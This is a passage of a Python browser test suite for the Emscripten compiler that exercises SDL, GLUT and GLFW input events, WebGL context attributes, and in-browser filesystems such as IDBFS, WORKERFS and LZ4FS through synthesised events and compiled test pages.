  self.compile_btest([src, '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
  shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
  self.post_manual_reftest('gears.png')
  self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
  """Canvas alpha blending with and without the -0 program flag.

  N.B. On Linux with Intel integrated graphics cards, this test needs
  Firefox 49 or newer; see
  https://github.com/emscripten-core/emscripten/issues/4069.
  """
  create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
  base = ['-lSDL', '-lGL']
  self.btest('sdl_canvas_alpha.c', args=base, reference='sdl_canvas_alpha.png', reference_slack=12)
  self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js'] + base,
             reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def get_async_args(self):
  """Extra emcc flags enabling asynchronous-execution (ASYNCIFY) support."""
  return ['-s', 'ASYNCIFY']
def test_sdl_key(self):
  """SDL keyboard events, in every combination of: delayed vs. immediate
  event dispatch, the emscripten SDL SetEventHandler extension, and
  ASYNCIFY sleeping in the handler. Each configuration must report the
  same checksum, 223092870."""
  for delay in [0, 1]:
    for defines in [
      [],
      ['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
    ]:
      for async_ in [
        [],
        ['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP'] + self.get_async_args()
      ]:
        print(delay, defines, async_)
        # When delay is set, each dispatch is wrapped in a 1ms setTimeout
        # via the %s placeholders below.
        create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
        self.compile_btest([path_from_root('tests', 'sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
        self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
  """SDL key events delivered to a program running in a proxied worker;
  synthetic key events are injected into the page by a post-build hook.

  Fix over the original: ``post()`` reads test.html with a ``with`` block so
  the handle is closed before the file is rewritten (the original leaked it
  from ``open(...).read()``).
  """
  create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
  def post():
    # Append a script that fires the scripted key sequence, then rewrite the page.
    with open('test.html') as f:
      html = f.read()
    html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
    create_test_file('test.html', html)
  self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
  """Canvas focus handling should report success (1)."""
  self.btest('canvas_focus.c', expected='1')
def test_keydown_preventdefault_proxy(self):
  """In a proxied worker, a prevent-defaulted keydown must suppress the
  follow-up keypress (as a real browser would), while a non-prevented one
  lets it through; the expected report is 300.

  Fix over the original: ``post()`` reads test.html with a ``with`` block so
  the handle is closed before the file is rewritten (the original leaked it
  from ``open(...).read()``).
  """
  def post():
    # Append a script that simulates the browser's keydown/keypress/keyup
    # interplay, then rewrite the page.
    with open('test.html') as f:
      html = f.read()
    html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
    create_test_file('test.html', html)
  self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
  """SDL text input: a pre-js polls _one() every frame and exposes a
  simulateKeyEvent() helper that dispatches keypress events to the body."""
  create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
  self.compile_btest([path_from_root('tests', 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
  self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
  """SDL mouse events: a pre-js helper synthesizes mousedown/mouseup
  (button >= 0) or mousemove (button < 0) at canvas-relative coordinates."""
  create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
  self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
  self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
  """SDL mouse coordinates when the canvas is offset inside the page: the
  custom page positions the canvas inside an absolutely-positioned
  container, and events are dispatched with raw page coordinates (no
  canvas offset added), exercising the runtime's own offset handling."""
  create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
  # Hand-written page: canvas offset 5px from the page origin via #container.
  create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
  self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
  self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
  """GLUT touch-event handling should report success (1)."""
  self.btest('glut_touchevents.c', expected='1', args=['-lglut'])
def test_glut_wheelevents(self):
  """GLUT mouse-wheel event handling should report success (1)."""
  self.btest('glut_wheelevents.c', expected='1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
  """glutGet queries without anti-aliasing: first plain, then with depth,
  stencil and alpha buffers enabled."""
  base = ['-lglut', '-lGL']
  for defines in ([], ['-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED']):
    self.btest('glut_glutget.c', '1', args=base + defines)
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
  """Like test_glut_glutget_no_antialias, but the second run also enables
  anti-aliasing (-DAA_ACTIVATED)."""
  base = ['-lglut', '-lGL']
  for defines in ([], ['-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED']):
    self.btest('glut_glutget.c', '1', args=base + defines)
def test_sdl_joystick_1(self):
  # Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
  # http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
  # In this draft, buttons are plain numbers (0/1) rather than objects.
  create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
  self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
  self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
  # Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
  # https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
  # Unlike test_sdl_joystick_1, buttons here are {pressed, value} objects.
  create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
  self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
  self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
  # Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
  # https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
  # Same spoofing as test_sdl_joystick_2, plus a 'gamepadconnected' event,
  # which GLFW requires to notice the pad.
  create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
  self.compile_btest([path_from_root('tests', 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
  self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
  # Javascript code to check the attributes support we want to test in the WebGL implementation
  # (request the attribute, create a context and check its value afterwards in the context attributes).
  # Tests will succeed when an attribute is not supported.
  create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
  # Copy common code file to temporary directory
  filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
  temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
  shutil.copyfile(filepath, temp_filepath)
  # perform tests with attributes activated
  self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
  self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
  self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
  self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
  # perform tests with attributes desactivated
  self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
  self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
  self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
  """WebGL error paths must not report twice (expects 0)."""
  self.btest('webgl_error.cpp', expected='0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
  shell = path_from_root('tests/preinitialized_webgl_context.html')
  self.btest('preinitialized_webgl_context.cpp', '5',
             args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', shell])
@requires_threads
def test_emscripten_get_now(self):
  """emscripten_get_now() in plain, pthreads, and closure/web-only builds."""
  variants = ([], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
  for args in variants:
    self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
  """File writing in a web-only (-s ENVIRONMENT=web) closure build; the
  program must exit with code 0."""
  flags = ['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1']
  self.btest_exit('write_file.c', 0, args=flags)
def test_fflush(self):
  """fflush behavior with EXIT_RUNTIME and a custom shell."""
  shell = path_from_root('tests', 'test_fflush.html')
  self.btest('test_fflush.cpp', expected='0',
             args=['-s', 'EXIT_RUNTIME', '--shell-file', shell],
             reporting=Reporting.NONE)
def test_file_db(self):
  """file_db.cpp run three times: the first (-DFIRST) preloads moar.txt
  containing a per-run secret; the later runs expect that same secret back
  — without any preloaded file, and with a different preloaded file — so
  the data evidently persists between page loads (presumably via IDBFS;
  confirm in file_db.cpp). Each page is kept for inspection."""
  secret = str(time.time())  # unique per run, so stale persisted data would fail
  create_test_file('moar.txt', secret)
  self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
  shutil.copyfile('test.html', 'first.html')
  self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
  shutil.copyfile('test.html', 'second.html')
  create_test_file('moar.txt', 'aliantha')
  self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
  shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
    """IDBFS syncfs round-trip: first run writes the secret, second run (with optional -DEXTRA_WORK) reads it."""
    for extra in [[], ['-DEXTRA_WORK']]:
        secret = str(time.time())
        # NOTE(review): '-lidbfs.js' appears twice in each args list; harmless but redundant
        self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'])
        self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
    """Same IDBFS round-trip as test_fs_idbfs_sync, but with EXIT_RUNTIME and a forced exit path."""
    secret = str(time.time())
    self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
    self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
    """fsync() on an IDBFS mount persists data: the pre.js mounts IDBFS and syncs it in before main()."""
    # sync from persisted state into memory before main()
    create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
    args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME'] + self.get_async_args()
    secret = str(time.time())
    self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
    self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
    """fsync() on plain MEMFS succeeds (no persistence expected, just correct API behavior)."""
    args = self.get_async_args() + ['-s', 'EXIT_RUNTIME']
    secret = str(time.time())
    self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
    """WORKERFS can read both Blob- and File-backed entries mounted in a worker."""
    secret = 'a' * 10
    secret2 = 'b' * 10
    # the pre.js mounts one Blob and one File into /work before main() runs
    create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
    self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
    """Files packaged by the file packager (with separate metadata) are readable via WORKERFS.

    Uses a context manager for the sub/file2.txt write instead of a bare
    open(...).write(...), which leaked the handle (and can break cleanup on
    Windows where open files cannot be removed).
    """
    create_test_file('file1.txt', 'first')
    ensure_dir('sub')
    with open(os.path.join('sub', 'file2.txt'), 'w') as f:
        f.write('second')
    self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
    self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
    """LZ4FS: package and read compressed data via emcc, the file packager, and manual loading.

    All raw file writes now use context managers; the original used bare
    open(...).write(...) in three places, leaking the handles.
    """
    # generate data
    ensure_dir('subdir')
    create_test_file('file1.txt', '0123456789' * (1024 * 128))
    with open(os.path.join('subdir', 'file2.txt'), 'w') as f:
        f.write('1234567890' * (1024 * 128))
    random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
    random_data[17] = ord('X')
    with open('file3.txt', 'wb') as f:
        f.write(random_data)
    # compress in emcc, -s LZ4=1 tells it to tell the file packager
    print('emcc-normal')
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
    assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
    assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2  # over half is gone
    print(' emcc-opts')
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
    # compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
    print('normal')
    out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
    with open('files.js', 'wb') as f:
        f.write(out)
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
    print(' opts')
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
    print(' modularize')
    self.compile_btest([path_from_root('tests', 'fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
    create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
    self.run_browser('a.html', '.', '/report_result?2')
    # load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
    print('manual')
    subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
    print(' opts')
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
    print(' opts+closure')
    self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure', '1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
    '''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
    """Separate-metadata packages load correctly even when their JS runs after the main program."""
    # see issue #6654 - we need to handle separate-metadata both when we run before
    # the main program, and when we are run later
    create_test_file('data.dat', ' ')
    self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
    self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
    """Drive idbstore through a scripted sequence of stages; each stage reports its own number."""
    secret = str(time.time())
    for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
        self.clear()  # fresh build dir per stage; IndexedDB state carries across stages
        self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
    """Synchronous idbstore access via the async transform (expects result '6')."""
    secret = str(time.time())
    self.clear()
    self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2'] + self.get_async_args())
def test_idbstore_sync_worker(self):
    """Same as test_idbstore_sync but proxied to a worker, with a larger initial memory."""
    secret = str(time.time())
    self.clear()
    self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB'] + self.get_async_args())
def test_force_exit(self):
    """emscripten_force_exit terminates the runtime with the expected exit value."""
    self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
    """SDL_PumpEvents picks up key events synthesized by the pre.js keydown() helper."""
